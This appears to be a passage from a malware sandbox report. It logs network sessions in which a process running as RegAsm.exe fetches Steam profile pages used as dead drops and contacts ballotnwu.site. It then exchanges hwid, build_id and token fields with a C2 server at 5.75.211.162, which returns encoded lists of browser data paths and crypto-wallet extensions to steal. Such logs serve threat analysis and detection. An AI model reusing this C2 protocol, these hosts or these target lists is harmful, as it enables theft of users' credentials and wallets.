{"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c962a27bbcc4207-EWR
2024-09-26 20:57:09 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 20:57:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49779	23.197.127.21	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:10 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-26 20:57:10 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 20:57:10 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=f63aa853d3f1d9d2e4fb7359; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 20:57:10 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 20:57:10 UTC	10062	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 20:57:10 UTC	10087	IN	Data Raw: 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e Data Ascii: COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARED_URL":"https:\/\/community.akamai.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49780	104.21.2.13	443	8136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:11 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-26 20:57:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 20:57:11 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3o2tohn7tb9l4lct8g34kmbro3; expires=Mon, 20 Jan 2025 14:43:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GLoFUwU0hy5GWSJgiI5Pne2l4%2FjE7BXYf2cUfT4EWXwM4lY4TgywSt5uzCbCQ5cGTxCMhBOb8vonP7NFbcQB6oD%2Ba9VXu6cw8SpCGYlvanJsFQ6Qpu6vUn%2FnVXZBkDOiuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c962a36dc7d8cd7-EWR
2024-09-26 20:57:11 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 20:57:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49781	104.102.49.254	443	2256	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:28 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:28 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 20:57:28 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=e38e870d3c9cd3d0adde263e; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 20:57:28 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 20:57:28 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 20:57:28 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 20:57:28 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49782	5.75.211.162	443	2256	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:29 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:57:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49783	5.75.211.162	443	2256	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:30 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAFHCBFHDHCAAKFHDGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:30 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 44 33 41 45 31 38 34 44 42 37 36 37 31 38 34 37 36 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 2d 2d 0d 0a Data Ascii: ------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="hwid"7CD3AE184DB7671847631-a33c7340-61ca------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EBAFHCBFHDHCAAKFHDGD--
2024-09-26 20:57:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:57:31 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 32 36 65 65 39 63 31 35 64 61 37 65 31 63 33 31 31 32 65 65 36 66 35 37 66 32 33 36 39 66 66 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|26ee9c15da7e1c3112ee6f57f2369ff0\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49784	5.75.211.162	443	2256	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:32 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:32 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 36 65 65 39 63 31 35 64 61 37 65 31 63 33 31 31 32 65 65 36 66 35 37 66 32 33 36 39 66 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="token"26ee9c15da7e1c3112ee6f57f2369ff0------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------KECBKKEBKEBFCAAAEGDHCont
2024-09-26 20:57:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:57:33 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49785	5.75.211.162	443	2256	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:33 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:33 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 36 65 65 39 63 31 35 64 61 37 65 31 63 33 31 31 32 65 65 36 66 35 37 66 32 33 36 39 66 66 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="token"26ee9c15da7e1c3112ee6f57f2369ff0------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HDAKFCGIJKJKFHIDHIIICont
2024-09-26 20:57:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:57:34 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49786	5.75.211.162	443	2256	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:35 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:35 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 36 65 65 39 63 31 35 64 61 37 65 31 63 33 31 31 32 65 65 36 66 35 37 66 32 33 36 39 66 66 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="token"26ee9c15da7e1c3112ee6f57f2369ff0------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DGHIDHCAAKECGCBFIJDBCont
2024-09-26 20:57:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
